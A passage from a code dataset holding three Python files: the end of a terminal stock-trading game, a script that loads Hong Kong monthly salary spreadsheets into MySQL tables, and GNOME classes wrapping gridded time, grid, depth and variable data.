self.owned += self.buy_limits[price]\n            self.buy_limits[price] = 0\n        for price in (_ for _ in self.sell_limits if _ <= self.buy):\n            self.cash += self.sell_limits[price] * price\n            self.sell_limits[price] = 0\n\n    def process_input(self, screen):\n        # b: market buy, s: market sell, n: limit buy, d: limit sell, x: cancel all open orders\n        user_in = screen.getch()\n        if user_in != -1:\n            user_in = chr(user_in)\n        if user_in == 'b' and self.cash > self.sell:\n            self.cash -= self.sell\n            self.owned += 1\n        if user_in == 's' and self.owned > 0:\n            self.owned -= 1\n            self.cash += self.buy\n        if user_in == 'd' and self.owned > 0:\n            self.owned -= 1\n            self.sell_limits[self.sell] += 1\n        if user_in == 'n' and self.cash > self.buy:\n            self.cash -= self.buy\n            self.buy_limits[self.buy] += 1\n        if user_in == 'x':\n            for price in self.buy_limits:\n                self.cash += price * self.buy_limits[price]\n                self.buy_limits[price] = 0\n            for price in self.sell_limits:\n                self.owned += self.sell_limits[price]\n                self.sell_limits[price] = 0\n\n    def run(self, screen):\n        screen.nodelay(True)\n        while True:\n            if time.time() < self.render_time + REFRESH_TIME:\n                time.sleep((self.render_time + REFRESH_TIME) - time.time())\n            screen.erase()\n            value = self.cash + self.owned*self.buy\n            output = [\n                'Cash: ${:,.2f}   Shares: {}'.format(self.cash, self.owned),\n                'Buy: ${:,.2f}   Sell: {:,.2f}'.format(self.buy, self.sell),\n                'Value: ${:,.2f}   Gain: {:,.1f}%'.format(value, ((value - STARTING_CASH) / STARTING_CASH)*100),\n                'Debug: {}'.format(self.debug_str),\n            ]\n            output.append('{:<40}{:>40}'.format('Limit Buy Orders', 'Limit Sell Orders'))\n            buys = [(price, self.buy_limits[price]) for price in self.buy_limits if self.buy_limits[price]]\n            buys = sorted(buys, key=lambda x: x[0])\n            sells = [(price, self.sell_limits[price]) for price in self.sell_limits if self.sell_limits[price]]\n            sells = sorted(sells, key=lambda x: x[0])\n            # zip_longest pads the shorter order book with None\n            for buy_tup, sell_tup in itertools.zip_longest(buys, sells):\n                buy_msg = ''\n                if buy_tup:\n                    buy_msg = "${:,.2f} - {} 
shares\".format(buy_tup[0], buy_tup[1])\n sell_msg = ''\n if sell_tup:\n sell_msg = \"${:,.2f} - {} shares\".format(sell_tup[0], sell_tup[1])\n output.append('{:<40}{:>40}'.format(buy_msg, sell_msg))\n output += self.draw_graph(len(output), self.price_history)\n for i, s in enumerate(output):\n screen.addstr(i, 0, s)\n self.render_time = time.time()\n self.process_input(screen)\n self.update_price()\n if time.time() <= self.price_time:\n self.update_price()\n # self.debug_str = 'trend_up={}'.format(self.trend_up)\n\nif __name__ == '__main__':\n game = ShavingGame()\n curses.wrapper(game.run)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"204844828","text":"#Prerequisites\nimport pandas as panda\n\nimport pymysql\n\ndef removeFootnoteTags(textSample):\n newText = \"\"\n\n cursor = 0\n ignoreChar = False\n\n while cursor < len(textSample):\n\n if \"(\" in textSample[cursor]:\n ignoreChar = True\n if \")\" in textSample[cursor]:\n ignoreChar = False\n\n\n if ignoreChar is not True:\n newText = newText + textSample[cursor]\n cursor += 1\n return newText\n\ndef shortenColumn(textSample):\n\n columnNameLength = 25\n newText = \"\"\n cursor = 0\n while cursor < columnNameLength and cursor < len(textSample):\n newText = newText + textSample[cursor]\n cursor += 1\n \n return newText\n \n\n#Create database connection\nhost = \"localhost\";\ndatabase = \"hkhousinganalysis\";\nusername = \"root\";\npassword = \"\";\n\n\nconnection = pymysql.connect(host=host, user=username, password=password, db=database)\n\n#Import data from Monthly Salary HK Stats\nworkbookSheets = panda.ExcelFile(\"../raw_data/censtats_data/monthlyPay_data.xlsx\")\n\n\ncursor = connection.cursor()\n\n#Check if table exists\ncheckTableExistsQuery = cursor.execute(\"SHOW TABLES WHERE `Tables_in_hkhousinganalysis` = 'censtats_monthlypay_amount_data';\")\n\nif checkTableExistsQuery > 0:\n print(\"Table exists\")\nelse:\n\n createAmountTableQuery = \"CREATE TABLE `censtats_monthlypay_amount_data` (\"\n createChangeTableQuery = \"CREATE TABLE `censtats_monthlypay_change_data` (\"\n\n #Get data for each sheet in workbook\n for sheet in workbookSheets.sheet_names:\n if(sheet != \"Index\"):\n\n \n\n monthlySalariesDataFeed = panda.read_excel(\"../raw_data/censtats_data/monthlyPay_data.xlsx\", sheet_name=sheet)\n\n\n\n createAmountTableQuery = createAmountTableQuery + \"`year`\" + \" VARCHAR(255) NOT NULL,\"\n createChangeTableQuery = createChangeTableQuery + \"`year`\" + \" VARCHAR(255) NOT NULL,\"\n #Get list of column names\n columns = list(monthlySalariesDataFeed)\n\n\n #Make table fields from catagories and subcategories\n\n categoryIndexTarget = 0\n\n earnerAllCategories = list(monthlySalariesDataFeed[columns[0]])\n\n earnerMonthlySalaries = list(monthlySalariesDataFeed[columns[1]])\n\n earnerMonthlySalariesYoYPercentChange = list(monthlySalariesDataFeed[columns[2]])\n\n #Interate through all rows\n while(categoryIndexTarget < len(list(earnerAllCategories))):\n if(\"By \" in str(earnerAllCategories[categoryIndexTarget])):\n \n #Create category name for table column\n categoryName = str(earnerAllCategories[categoryIndexTarget])\n categoryName = categoryName.replace(\"By \", \"\")\n\n #Check for numbers in format \"( number )\" and remove\n categoryName = removeFootnoteTags(categoryName)\n\n categoryName = categoryName.replace(\")\", \"\")\n\n categoryName = categoryName.replace(\" \", \"_\")\n\n 
categoryName = shortenColumn(categoryName)\n\n \n #Find how many subcategories to count before reaching next category\n subcategoryIndexTarget = categoryIndexTarget + 1 #Start off on next line after the By line\n\n \n #Get subcategory from category\n for x in range(len(earnerAllCategories)):\n if(earnerAllCategories[subcategoryIndexTarget] == \"Notes : \"):\n break;\n elif(\"By \" in str(earnerAllCategories[subcategoryIndexTarget])): #End of category\n break;\n else:\n subcategoryName = str(earnerAllCategories[subcategoryIndexTarget])\n \n \n\n #Check for numbers in format \"( number )\" and remove\n subcategoryName = removeFootnoteTags(subcategoryName)\n\n #Check and strip punctuation\n punctuationBlacklist = \"!@#$%^&*_+-=/\\|.,;:≥)\";\n for punctuationCursor in subcategoryName:\n if punctuationCursor in punctuationBlacklist:\n subcategoryName = subcategoryName.replace(punctuationCursor, \"\")\n\n \n\n subcategoryName = subcategoryName.replace(\" \", \"_\")\n \n subcategoryName = subcategoryName.lower()\n \n subcategoryName = shortenColumn(subcategoryName)\n\n subcategoryMonthlySalary = earnerMonthlySalaries[subcategoryIndexTarget];\n\n subcategoryMonthlySalaryYoYPercentChange = earnerMonthlySalariesYoYPercentChange[subcategoryIndexTarget]\n\n\n\n #Remove empty rows that include nan\n if(subcategoryName != \"nan\"):\n #Display output\n \n createAmountTableQuery = createAmountTableQuery + \"`\" + categoryName + \"-\" + subcategoryName + \"`\" + \" VARCHAR(255) NULL,\"\n createChangeTableQuery = createChangeTableQuery + \"`\" + categoryName + \"-\" + subcategoryName + \"`\" + \" VARCHAR(255) NULL,\"\n #print(categoryName+\"-\"+subcategoryName)\n \n subcategoryIndexTarget += 1\n \n categoryIndexTarget += 1 \n elif(str(earnerAllCategories[categoryIndexTarget]) == \"Notes : \"):\n createAmountTableQuery = createAmountTableQuery[:-1]\n createAmountTableQuery = createAmountTableQuery + \", PRIMARY KEY (`year`)\" + \");\"\n\n createChangeTableQuery = createChangeTableQuery[:-1]\n createChangeTableQuery = createChangeTableQuery + \", PRIMARY KEY (`year`)\" + \");\"\n\n #print(createTableQuery)\n createAmountTable = cursor.execute(createAmountTableQuery)\n\n connection.commit()\n \n createChangeTable = cursor.execute(createChangeTableQuery)\n connection.commit()\n\n print(\"Monthly salary tables created\")\n\n break;\n else:\n categoryIndexTarget +=1\n break;\n\n\n#Check for non-existing columns and add columns to database table\n\n\nfor sheet in workbookSheets.sheet_names:\n if(sheet != \"Index\"):\n monthlySalariesDataFeed = panda.read_excel(\"../raw_data/censtats_data/monthlyPay_data.xlsx\", sheet_name=sheet)\n\n\n print(\"Checking sheet\"+ sheet +\"\\n\\n\")\n #Get list of column names\n columns = list(monthlySalariesDataFeed)\n\n sheetKeys = []\n\n #Make table fields from catagories and subcategories\n\n categoryIndexTarget = 0\n\n earnerAllCategories = list(monthlySalariesDataFeed[columns[0]])\n\n #Interate through all rows\n while(categoryIndexTarget < len(list(earnerAllCategories))):\n if(\"By \" in str(earnerAllCategories[categoryIndexTarget])):\n \n #Create category name for table column\n categoryName = str(earnerAllCategories[categoryIndexTarget])\n categoryName = categoryName.replace(\"By \", \"\")\n\n #Check for numbers in format \"( number )\" and remove\n categoryName = removeFootnoteTags(categoryName)\n\n categoryName = categoryName.replace(\")\", \"\")\n\n categoryName = categoryName.replace(\" \", \"_\")\n\n categoryName = shortenColumn(categoryName)\n\n \n #Find how many 
subcategories to count before reaching next category\n subcategoryIndexTarget = categoryIndexTarget + 1 #Start off on next line after the By line\n\n \n #Get subcategory from category\n for x in range(len(earnerAllCategories)):\n if(earnerAllCategories[subcategoryIndexTarget] == \"Notes : \"):\n break;\n elif(\"By \" in str(earnerAllCategories[subcategoryIndexTarget])): #End of category\n break;\n else:\n subcategoryName = str(earnerAllCategories[subcategoryIndexTarget])\n \n \n\n #Check for numbers in format \"( number )\" and remove\n subcategoryName = removeFootnoteTags(subcategoryName)\n\n #Check and strip punctuation\n punctuationBlacklist = \"!@#$%^&*_+-=/\\|.,;:≥)\";\n for punctuationCursor in subcategoryName:\n if punctuationCursor in punctuationBlacklist:\n subcategoryName = subcategoryName.replace(punctuationCursor, \"\")\n\n \n\n subcategoryName = subcategoryName.replace(\" \", \"_\")\n \n subcategoryName = subcategoryName.lower()\n \n subcategoryName = shortenColumn(subcategoryName)\n\n #Remove empty rows that include nan\n if(subcategoryName != \"nan\"):\n #Display output\n \n sheetKeys.append(categoryName+\"-\"+subcategoryName)\n #print(categoryName+\"-\"+subcategoryName)\n \n subcategoryIndexTarget += 1\n \n categoryIndexTarget += 1 \n elif(str(earnerAllCategories[categoryIndexTarget]) == \"Notes : \"):\n\n tempComparisonStorage = []\n \n #Check monthly amount table\n compareMonthlyPayAmountColumnNamesQuery = cursor.execute(\"SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name = 'censtats_monthlypay_amount_data';\")\n\n\n compareMonthlyPayAmountColumnNames = cursor.fetchall()\n \n\n \n for column in compareMonthlyPayAmountColumnNames:\n tempComparisonStorage.append(column[0])\n\n \n del tempComparisonStorage[0]\n\n if sheetKeys != tempComparisonStorage:\n addMissingAmountColumnsQuery = \"ALTER TABLE `censtats_monthlypay_amount_data` \"\n for sheetColumn in sheetKeys:\n if sheetColumn not in tempComparisonStorage:\n addMissingAmountColumnsQuery = addMissingAmountColumnsQuery + \"ADD `\" + sheetColumn + \"`\" + \" VARCHAR(255) NULL,\"\n \n \n addMissingAmountColumnsQuery = addMissingAmountColumnsQuery[:-1]\n addMissingAmountColumnsQuery = addMissingAmountColumnsQuery + \";\"\n \n\n addMissingAmountColumns = cursor.execute(addMissingAmountColumnsQuery)\n connection.commit()\n print(\"New monthly pay amount column(s) added\")\n\n #Check monthly change table\n tempComparisonStorage = []\n compareMonthlyPayChangeColumnNamesQuery = cursor.execute(\"SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name = 'censtats_monthlypay_change_data';\")\n\n\n compareMonthlyPayChangeColumnNames = cursor.fetchall()\n \n for column in compareMonthlyPayChangeColumnNames:\n tempComparisonStorage.append(column[0])\n\n del tempComparisonStorage[0]\n\n if sheetKeys != tempComparisonStorage:\n addMissingChangeColumnsQuery = \"ALTER TABLE `censtats_monthlypay_change_data` \"\n for sheetColumn in sheetKeys:\n if sheetColumn not in tempComparisonStorage:\n addMissingChangeColumnsQuery = addMissingChangeColumnsQuery + \"ADD `\" + sheetColumn + \"`\" + \" VARCHAR(255) NULL,\"\n \n \n addMissingChangeColumnsQuery = addMissingChangeColumnsQuery[:-1]\n addMissingChangeColumnsQuery = addMissingChangeColumnsQuery + \";\"\n \n\n addMissingChangeColumns = cursor.execute(addMissingChangeColumnsQuery)\n connection.commit()\n print(\"New monthly pay change column(s) added\")\n\n break;\n else:\n categoryIndexTarget +=1\n \n#Import bulk data\n\nfor sheet in workbookSheets.sheet_names:\n 
if(sheet != \"Index\"):\n\n monthlySalariesDataFeed = panda.read_excel(\"../raw_data/censtats_data/monthlyPay_data.xlsx\", sheet_name=sheet)\n \n sheetKeys = []\n \n #Get sheet year\n sheetName = sheet\n sheetName = sheetName.replace(\"E\", \"\")\n\n\n #Get list of column names\n columns = list(monthlySalariesDataFeed)\n\n\n #Import query template\n importBulkMonthlyPayAmountDataQuery = \"INSERT IGNORE INTO `censtats_monthlypay_amount_data` (`year`,\"\n\n importBulkMonthlyPayChangeDataQuery = \"INSERT IGNORE INTO `censtats_monthlypay_change_data` (`year`,\"\n\n\n #Store selected data and columns\n tempBulkMonthlyPayColumnsSelect = \"\"\n\n tempBulkMonthlyPayAmountDataSelect = \"'\" + sheetName + \"',\"\n tempBulkMonthlyPayChangeDataSelect = \"'\" + sheetName + \"',\"\n \n #Make table fields from catagories and subcategories\n\n categoryIndexTarget = 0\n\n earnerAllCategories = list(monthlySalariesDataFeed[columns[0]])\n earnerAmount = list(monthlySalariesDataFeed[columns[1]])\n earnerChange = list(monthlySalariesDataFeed[columns[2]])\n\n #print(earnerAmount)\n #Interate through all rows\n while(categoryIndexTarget < len(list(earnerAllCategories))):\n if(\"By \" in str(earnerAllCategories[categoryIndexTarget])):\n \n #Create category name for table column\n categoryName = str(earnerAllCategories[categoryIndexTarget])\n categoryName = categoryName.replace(\"By \", \"\")\n\n #Check for numbers in format \"( number )\" and remove\n categoryName = removeFootnoteTags(categoryName)\n\n categoryName = categoryName.replace(\")\", \"\")\n\n categoryName = categoryName.replace(\" \", \"_\")\n\n categoryName = shortenColumn(categoryName)\n\n \n #Find how many subcategories to count before reaching next category\n subcategoryIndexTarget = categoryIndexTarget + 1 #Start off on next line after the By line\n\n\n\n #Get subcategory from category\n for x in range(len(earnerAllCategories)):\n if(earnerAllCategories[subcategoryIndexTarget] == \"Notes : \"):\n break;\n elif(\"By \" in str(earnerAllCategories[subcategoryIndexTarget])): #End of category\n break;\n else:\n subcategoryName = str(earnerAllCategories[subcategoryIndexTarget])\n \n \n\n #Check for numbers in format \"( number )\" and remove\n subcategoryName = removeFootnoteTags(subcategoryName)\n\n #Check and strip punctuation\n punctuationBlacklist = \"!@#$%^&*_+-=/\\|.,;:≥)\";\n for punctuationCursor in subcategoryName:\n if punctuationCursor in punctuationBlacklist:\n subcategoryName = subcategoryName.replace(punctuationCursor, \"\")\n\n \n\n subcategoryName = subcategoryName.replace(\" \", \"_\")\n \n subcategoryName = subcategoryName.lower()\n \n subcategoryName = shortenColumn(subcategoryName)\n\n \n #Remove empty rows that include nan\n if(subcategoryName != \"nan\"):\n \n sheetKeys.append(categoryName+\"-\"+subcategoryName)\n\n \n #print(categoryName+\"-\"+subcategoryName)\n \n \n\n subcategoryIndexTarget += 1\n \n categoryIndexTarget += 1 \n elif(str(earnerAllCategories[categoryIndexTarget]) == \"Notes : \"):\n\n for column in sheetKeys:\n tempBulkMonthlyPayColumnsSelect = tempBulkMonthlyPayColumnsSelect + \"`\" + column + \"`,\"\n for x in range(len(earnerAllCategories)):\n \n\n if(str(earnerAmount[x]) != \"nan\" and str(earnerAmount[x]) != \"Median monthly wage (HK$)\"):\n tempBulkMonthlyPayAmountDataSelect = tempBulkMonthlyPayAmountDataSelect + \"'\" + str(earnerAmount[x]) + \"',\"\n if(str(earnerChange[x]) != \"nan\" and str(earnerChange[x]) != \"Year-on-year % change\"):\n tempBulkMonthlyPayChangeDataSelect = 
tempBulkMonthlyPayChangeDataSelect + \"'\" + str(earnerChange[x]) + \"',\"\n\n tempBulkMonthlyPayAmountDataSelect = tempBulkMonthlyPayAmountDataSelect[:-1]\n\n tempBulkMonthlyPayChangeDataSelect = tempBulkMonthlyPayChangeDataSelect[:-1]\n \n tempBulkMonthlyPayColumnsSelect = tempBulkMonthlyPayColumnsSelect[:-1]\n\n\n\n #Compile queries together\n importBulkMonthlyPayAmountDataQuery = importBulkMonthlyPayAmountDataQuery + tempBulkMonthlyPayColumnsSelect + \") VALUES (\" + tempBulkMonthlyPayAmountDataSelect + \");\"\n\n importBulkMonthlyPayChangeDataQuery = importBulkMonthlyPayChangeDataQuery + tempBulkMonthlyPayColumnsSelect + \") VALUES (\" + tempBulkMonthlyPayChangeDataSelect + \");\"\n\n importBulkMonthlyPayAmountData = cursor.execute(importBulkMonthlyPayAmountDataQuery)\n\n connection.commit()\n\n importBulkMonthlyPayChangeData = cursor.execute(importBulkMonthlyPayChangeDataQuery)\n\n connection.commit()\n\n print(\"Monthly salary amounts for \"+sheetName+\" and changes updated\")\n break;\n \n else:\n categoryIndexTarget +=1 ","sub_path":"import/import_monthlysalary_data.py","file_name":"import_monthlysalary_data.py","file_ext":"py","file_size_in_byte":18959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"29249623","text":"import datetime\nimport StringIO\nimport copy\nimport numpy as np\n\nfrom colander import (SchemaNode, SequenceSchema,\n Sequence, String, Boolean, DateTime,\n drop)\n\nimport gridded\n\nfrom gnome.persist import base_schema\nfrom gnome.gnomeobject import GnomeId\nfrom gnome.persist.extend_colander import FilenameSchema\nfrom gnome.persist.base_schema import GeneralGnomeObjectSchema\nfrom gnome.persist.validators import convertible_to_seconds\nfrom gnome.persist.extend_colander import LocalDateTime\nfrom gnome.utilities.inf_datetime import InfDateTime\n\n\nclass TimeSchema(base_schema.ObjTypeSchema):\n filename = FilenameSchema(\n isdatafile=True, test_equal=False, update=False\n )\n varname = SchemaNode(\n String(), read_only=True\n )\n data = SequenceSchema(\n SchemaNode(\n DateTime(default_tzinfo=None)\n )\n )\n\n\nclass GridSchema(base_schema.ObjTypeSchema):\n name = SchemaNode(String(), test_equal=False) #remove this once gridded stops using _def_count\n filename = FilenameSchema(\n isdatafile=True, test_equal=False, update=False\n )\n\nclass DepthSchema(base_schema.ObjTypeSchema):\n filename = FilenameSchema(\n isdatafile=True, test_equal=False, update=False\n )\n\n\nclass VariableSchemaBase(base_schema.ObjTypeSchema):\n #filename\n #data?\n units = SchemaNode(String())\n time = TimeSchema(\n save_reference=True\n )\n grid = GridSchema(\n save_reference=True\n )\n data_file = FilenameSchema(\n isdatafile=True, test_equal=False, update=False\n )\n grid_file = FilenameSchema(\n isdatafile=True, test_equal=False, update=False\n )\n extrapolation_is_allowed = SchemaNode(Boolean())\n data_start = SchemaNode(LocalDateTime(), read_only=True,\n validator=convertible_to_seconds)\n data_stop = SchemaNode(LocalDateTime(), read_only=True,\n validator=convertible_to_seconds)\n\n\nclass VariableSchema(VariableSchemaBase):\n varname = SchemaNode(\n String(), missing=drop, read_only=True\n )\n\n\nclass VectorVariableSchema(VariableSchemaBase):\n varnames = SequenceSchema(\n SchemaNode(String()),\n read_only=True\n )\n variables = SequenceSchema(\n GeneralGnomeObjectSchema(\n acceptable_schemas=[VariableSchema, base_schema.ObjTypeSchema]\n ), save_reference=True\n )\n\n\nclass Time(gridded.time.Time, GnomeId):\n\n _schema 
= TimeSchema\n\n @classmethod\n def from_file(cls, filename=None, **kwargs):\n if isinstance(filename, list):\n filename = filename[0]\n\n t = []\n\n with open(filename, 'r') as fd:\n for line in fd:\n line = line.rstrip()\n if line is not None:\n t.append(datetime.datetime.strptime(line, '%c'))\n\n return Time(t)\n\n\nclass Grid_U(gridded.grids.Grid_U, GnomeId):\n\n _schema = GridSchema\n\n def draw_to_plot(self, ax, features=None, style=None):\n import matplotlib\n def_style = {'color': 'blue',\n 'linestyle': 'solid'}\n s = def_style.copy()\n\n if style is not None:\n s.update(style)\n\n lines = self.get_lines()\n lines = matplotlib.collections.LineCollection(lines, **s)\n\n ax.add_collection(lines)\n\n @classmethod\n def new_from_dict(cls, dict_):\n rv = cls.from_netCDF(**dict_)\n\n return rv\n\n def get_cells(self):\n return self.nodes[self.faces]\n\n def get_lines(self):\n '''\n Returns an array of lengths, and a list of line arrays.\n The first array sequentially indexes the second array.\n When the second array is split up using the first array\n and the resulting lines are drawn, you should end up with a picture of\n the grid.\n '''\n open_cells = self.nodes[self.faces]\n closed_cells = np.concatenate((open_cells, open_cells[:, None, 0]),\n axis=1)\n closed_cells = closed_cells.astype(np.float32, copy=False)\n lengths = closed_cells.shape[1] * np.ones(closed_cells.shape[0],\n dtype=np.int32)\n\n return (lengths, [closed_cells])\n\n def get_nodes(self):\n return self.nodes[:]\n\n def get_centers(self):\n if self.face_coordinates is None:\n self.build_face_coordinates()\n return self.face_coordinates\n\n def get_metadata(self):\n json_ = {}\n json_['nodes_shape'] = self.nodes.shape\n json_['num_nodes'] = self.nodes.shape[0]\n json_['num_cells'] = self.faces.shape[0]\n return json_\n\n\nclass Grid_S(GnomeId, gridded.grids.Grid_S):\n\n _schema = GridSchema\n\n '''hack to avoid problems when registering object in webgnome'''\n @property\n def non_grid_variables(self):\n return None\n\n def draw_to_plot(self, ax, features=None, style=None):\n def_style = {'node': {'color': 'green',\n 'linestyle': 'dashed',\n 'marker': 'o'},\n 'center': {'color': 'blue',\n 'linestyle': 'solid'},\n 'edge1': {'color': 'purple'},\n 'edge2': {'color': 'olive'}}\n\n if features is None:\n features = ['node']\n st = def_style.copy()\n\n if style is not None:\n for k in style.keys():\n st[k].update(style[k])\n\n for f in features:\n s = st[f]\n lon, lat = self._get_grid_vars(f)\n\n ax.plot(lon, lat, **s)\n ax.plot(lon.T, lat.T, **s)\n\n @classmethod\n def new_from_dict(cls, dict_):\n rv = cls.from_netCDF(**dict_)\n return rv\n\n def get_cells(self):\n if not hasattr(self, '_cell_trees'):\n self.build_celltree()\n\n ns = self._cell_trees['node'][1]\n fs = self._cell_trees['node'][2]\n\n return ns[fs]\n\n def get_nodes(self):\n if not hasattr(self, '_cell_trees'):\n self.build_celltree()\n\n n = self._cell_trees['node'][1]\n\n return n\n\n def get_centers(self):\n if self.center_lon is None:\n lons = (self.node_lon[0:-1, 0:-1] + self.node_lon[1:, 1:]) / 2\n lats = (self.node_lat[0:-1, 0:-1] + self.node_lat[1:, 1:]) / 2\n return np.stack((lons, lats), axis=-1).reshape(-1, 2)\n else:\n return self.centers.reshape(-1, 2)\n\n def get_metadata(self):\n if not hasattr(self, '_cell_trees'):\n self.build_celltree()\n json_ = {}\n json_['nodes_shape'] = self.nodes.shape\n json_['num_nodes'] = self.nodes.shape[0] * self.nodes.shape[1]\n json_['num_cells'] = self._cell_trees['node'][2].shape[0]\n return json_\n\n def 
get_lines(self):\n '''\n Returns an array of lengths, and a list of line arrays.\n The first array sequentially indexes the second array.\n When the second array is split up using the first array\n and the resulting lines are drawn, you should end up with a picture of\n the grid.\n '''\n hor_lines = (np.dstack((self.node_lon[:], self.node_lat[:])).astype(np.float32))\n ver_lines = (hor_lines.transpose((1, 0, 2)).astype(np.float32))\n\n hor_lens = hor_lines.shape[1] * np.ones(hor_lines.shape[0],\n dtype=np.int32)\n ver_lens = ver_lines.shape[1] * np.ones(ver_lines.shape[0],\n dtype=np.int32)\n lens = np.concatenate((hor_lens, ver_lens))\n\n return (lens, [hor_lines, ver_lines])\n\n\nclass Grid_R(gridded.grids.Grid_R, GnomeId):\n\n _schema = GridSchema\n\n @classmethod\n def new_from_dict(cls, dict_):\n rv = cls.from_netCDF(**dict_)\n return rv\n\n def get_nodes(self):\n return self.nodes.reshape(-1, 2)\n\n def get_centers(self):\n return self.centers.reshape(-1, 2)\n\n def get_cells(self):\n return np.concatenate(self.node_lon, self.node_lat)\n\n def get_lines(self):\n\n lon_lines = np.array([[(lon, self.node_lat[0]),\n (lon, self.node_lat[len(self.node_lat) / 2]),\n (lon, self.node_lat[-1])]\n for lon in self.node_lon], dtype=np.float32)\n lat_lines = np.array([[(self.node_lon[0], lat),\n (self.node_lon[len(self.node_lon) / 2], lat),\n (self.node_lon[-1], lat)]\n for lat in self.node_lat], dtype=np.float32)\n\n lon_lens = lon_lines.shape[1] * np.ones(lon_lines.shape[0],\n dtype=np.int32)\n lat_lens = lat_lines.shape[1] * np.ones(lat_lines.shape[0],\n dtype=np.int32)\n lens = np.concatenate((lon_lens, lat_lens))\n\n return (lens, [lon_lines, lat_lines])\n\n\nclass PyGrid(gridded.grids.Grid):\n\n @staticmethod\n def from_netCDF(*args, **kwargs):\n kwargs['_default_types'] = (('ugrid', Grid_U),\n ('sgrid', Grid_S),\n ('rgrid', Grid_R))\n\n return gridded.grids.Grid.from_netCDF(*args, **kwargs)\n\n @staticmethod\n def new_from_dict(dict_):\n return PyGrid.from_netCDF(**dict_)\n\n @staticmethod\n def _get_grid_type(*args, **kwargs):\n kwargs['_default_types'] = (('ugrid', Grid_U),\n ('sgrid', Grid_S),\n ('rgrid', Grid_R))\n\n return gridded.grids.Grid._get_grid_type(*args, **kwargs)\n\n\nclass Depth(gridded.depth.Depth):\n @staticmethod\n def from_netCDF(*args, **kwargs):\n kwargs['_default_types'] = (('level', L_Depth),\n ('sigma', S_Depth),\n ('surface', DepthBase))\n\n return gridded.depth.Depth.from_netCDF(*args, **kwargs)\n\n @staticmethod\n def _get_depth_type(*args, **kwargs):\n kwargs['_default_types'] = (('level', L_Depth),\n ('sigma', S_Depth),\n ('surface', DepthBase))\n\n return gridded.depth.Depth._get_depth_type(*args, **kwargs)\n\n\nclass Variable(gridded.Variable, GnomeId):\n _schema = VariableSchema\n\n default_names = []\n cf_names = []\n\n _default_component_types = copy.deepcopy(gridded.Variable\n ._default_component_types)\n _default_component_types.update({'time': Time,\n 'grid': PyGrid,\n 'depth': Depth})\n\n def __init__(self, extrapolation_is_allowed=False, *args, **kwargs):\n self.extrapolation_is_allowed = extrapolation_is_allowed\n super(Variable, self).__init__(*args, **kwargs)\n\n def at(self, *args, **kwargs):\n if ('extrapolate' not in kwargs):\n kwargs['extrapolate'] = False\n if ('unmask' not in kwargs):\n kwargs['unmask'] = True\n\n return super(Variable, self).at(*args, **kwargs)\n\n @classmethod\n def new_from_dict(cls, dict_):\n if 'data' not in dict_:\n return cls.from_netCDF(**dict_)\n\n return super(Variable, cls).new_from_dict(dict_)\n\n @property\n def 
extrapolation_is_allowed(self):\n        if self.time is not None:\n            return self.time.min_time == self.time.max_time or self._extrapolation_is_allowed\n        else:\n            return self._extrapolation_is_allowed\n\n    @extrapolation_is_allowed.setter\n    def extrapolation_is_allowed(self, e):\n        self._extrapolation_is_allowed = e\n\n    @property\n    def data_start(self):\n        if self.time.min_time == self.time.max_time or self.extrapolation_is_allowed:\n            return InfDateTime(\"-inf\")\n        else:\n            return self.time.min_time.replace(tzinfo=None)\n\n    @property\n    def data_stop(self):\n        if self.time.min_time == self.time.max_time or self.extrapolation_is_allowed:\n            return InfDateTime(\"inf\")\n        else:\n            return self.time.max_time.replace(tzinfo=None)\n\n\nclass DepthBase(gridded.depth.DepthBase, GnomeId):\n\n    _schema = DepthSchema\n\n    _default_component_types = copy.deepcopy(gridded.depth.DepthBase\n                                             ._default_component_types)\n    _default_component_types.update({'time': Time,\n                                     'grid': PyGrid,\n                                     'variable': Variable})\n\n    @classmethod\n    def new_from_dict(cls, dict_):\n        rv = cls.from_netCDF(**dict_)\n        return rv\n\n    def interpolation_alphas(self, points, time, data_shape, _hash=None, **kwargs):\n        return (None, None)\n\n\nclass L_Depth(gridded.depth.L_Depth, GnomeId):\n    _schema = DepthSchema\n\n    _default_component_types = copy.deepcopy(gridded.depth.L_Depth\n                                             ._default_component_types)\n    _default_component_types.update({'time': Time,\n                                     'grid': PyGrid,\n                                     'variable': Variable})\n\n    @classmethod\n    def new_from_dict(cls, dict_):\n        rv = cls.from_netCDF(**dict_)\n        return rv\n\n\nclass S_Depth(gridded.depth.S_Depth, GnomeId):\n\n    _schema = DepthSchema\n\n    _default_component_types = copy.deepcopy(gridded.depth.S_Depth\n                                             ._default_component_types)\n    _default_component_types.update({'time': Time,\n                                     'grid': PyGrid,\n                                     'variable': Variable})\n\n    @classmethod\n    def new_from_dict(cls, dict_):\n        rv = cls.from_netCDF(**dict_)\n        return rv\n\nclass VectorVariable(gridded.VectorVariable, GnomeId):\n\n    _schema = VectorVariableSchema\n\n    _default_component_types = copy.deepcopy(gridded.VectorVariable\n                                             ._default_component_types)\n    _default_component_types.update({'time': Time,\n                                     'grid': PyGrid,\n                                     'depth': Depth,\n                                     'variable': Variable})\n\n    @classmethod\n    def new_from_dict(cls, dict_, **kwargs):\n        if not dict_.get('variables', False):\n            return super(VectorVariable, cls).new_from_dict(cls.from_netCDF(**dict_).to_dict(), **kwargs)\n        else:\n            return super(VectorVariable, cls).new_from_dict(dict_, **kwargs)\n\n    def get_data_vectors(self):\n        '''\n        return array of shape (time_slices, len_linearized_data,2)\n        first is magnitude, second is direction\n        '''\n        raw_u = self.variables[0].data[:]\n        raw_v = self.variables[1].data[:]\n\n        if self.depth is not None:\n            raw_u = raw_u[:, self.depth.surface_index]\n            raw_v = raw_v[:, self.depth.surface_index]\n\n        if np.any(np.array(raw_u.shape) != np.array(raw_v.shape)):\n            # must be roms-style staggered\n            raw_u = (raw_u[:, 0:-1, :] + raw_u[:, 1:, :]) / 2\n            raw_v = (raw_v[:, :, 0:-1] + raw_v[:, :, 1:]) / 2\n\n        raw_u = raw_u.reshape(raw_u.shape[0], -1)\n        raw_v = raw_v.reshape(raw_v.shape[0], -1)\n        #r = np.ma.stack((raw_u, raw_v)) change to this when numpy 1.15 becomes norm.\n        r = np.ma.concatenate((raw_u[None,:], raw_v[None,:]))\n\n        return np.ascontiguousarray(r.filled(0), np.float32)\n\n    def get_metadata(self):\n        